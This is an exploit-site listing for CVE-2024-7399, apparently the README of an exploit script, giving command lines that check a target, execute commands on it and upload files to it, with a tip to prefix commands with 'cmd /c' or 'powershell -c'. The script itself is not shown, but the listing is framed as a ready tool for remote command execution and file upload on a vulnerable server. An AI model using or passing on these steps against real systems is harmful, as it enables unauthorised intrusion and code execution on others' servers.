## https://sploitus.com/exploit?id=D001F32B-F466-5E90-99FC-A21F0C5C0495
# CVE-2024-7399
Exploit for CVE-2024-7399.
More details can be found here: https://davidxbors.github.io/0xpages/posts/cve-2024-7399/.
Usage:
```bash
python3 CVE-2024-7399.py https://localhost:7002/ --check
python3 CVE-2024-7399.py https://localhost:7002/ --execute
python3 CVE-2024-7399.py https://localhost:7002/ --upload test.txt
```
When executing commands, use `cmd /c` or `powershell -c` before your actual command!